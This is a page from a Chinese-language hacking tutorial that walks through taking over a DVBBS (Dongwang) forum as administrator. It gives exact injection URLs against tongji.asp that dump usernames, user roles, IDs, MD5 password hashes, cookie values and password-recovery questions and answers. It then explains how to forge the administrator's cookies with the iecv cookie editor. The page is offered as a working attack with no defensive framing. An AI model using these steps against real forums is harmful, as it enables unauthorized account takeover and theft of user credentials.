第二招：温柔一刀成为论坛管理员

　　仍旧以动网先锋论坛为例。最近该论坛出现一个漏洞，使得普通用户可以轻松地获得论坛中任意用户的密码，包括管理员在内！由于其tongji.asp文件没有过滤用户提交SQL查询的输入，导致远程攻击者可以利用这个漏洞进行SQL攻击，进而威胁论坛或服务器安全。注意，该手段对DVBBS VER 6.0.0及6.0.0 SP1、SP2都有效，对低版本的动网论坛也有效，而且无论数据库是ACCESS还是MS SQL都通吃。

　　攻击方法为：找到你的目标论坛，然后输入其网址，假设为http://www.target.com/asp/dvbbs/index.asp，然后查询管理员的名字，每个论坛中都有这样的人，记住该人的论坛ID。接着在浏览器地址栏中输入：http://www.target.com/dvbbs/tongji.asp?orders=2&N=10，注意“N=”后面你可以随意写上任何数字，它表示你想查询几个论坛用户，回车即可看到该论坛的用户名（如图1）。看到其中的管理员的名字了吗？OK，接下来在地址栏中输入“http://www.target.com/dvbbs/tongji.asp?orders=2&N=10%20userclass,”，这样就会查到这些人在论坛中的身份（如图2），注意其中的管理员身份的人，他具有最高权限，黑客的目标就是他。下一步，请在地址栏中输入“http://www.target.com/dvbbs/tongji.asp?orders=2&N=10%20userid,”，回车后在你看到的窗口中（如图3）记住管理员的ID在论坛中是第几位注册用户，假设为1。再下一步，在地址栏中输入“http://www.target.com/dvbbs/tongji.asp?orders=2&N=10%20userpassword,”，这样你就会看到论坛中用户的密码（如图4），可惜是经过MD5加密处理的，但这已经足够了。最后再输入“http://www.target.com/dvbbs/tongji.asp?orders=2&N=10%20usercookies,”，回车后在出现的窗口中（如图5）记下管理员的usercookies的值，一般为0。好了，到现在黑客就得到管理员的Cookies的内容了，他可以通过在本机中伪造管理员的Cookies来入侵论坛。如果你输入“http://www.target.com/dvbbs/tongji.asp?orders=2&N=10%20quesion,”，还可以得到论坛中用户忘记密码时的密码提示问题，输入“http://www.target.com/dvbbs/tongji.asp?orders=2&N=10%20answer,”可以得到他的问题答案（也是MD5加密的）！

　　接下来在该论坛新注册一个新用户，然后用Cookies管理软件（如iecv）改造自己在该论坛的Cookies。其实，这一步的目的就是通过Cookies来让论坛以为你就是管理员，因为论坛判定是否是管理员的主要方法就是通过论坛ID和密码来实现的，而Cookies中记录的正是论坛ID和密码，当然这个密码是加密存放在Cookies中的。

　　运行Cookies管理软件iecv，选择“View”菜单下的“Obsolete cookie file”，就可以看到你的电脑中的Cookies文件了。由于你是新注册的论坛ID，所以在iecv的主界面的最开头就可以看到该论坛的Cookies文件，在它前面打上“√”，然后右键单击界面中央的aspsky，选择弹出菜单中的“编辑Cookie的内容”（图6），然后就可以编辑你的Cookies内容了，把里面的内容替换为你刚刚查到的内容即可。最后关闭该软件，并关闭浏览器，重新输入该论坛的地址，进入后黑客就会成为该论坛的管理员了！此时这个论坛就在黑客的掌握之中了，干什么都可以随心所欲了！

 

上一页  [1] [2] [3] [4] 下一页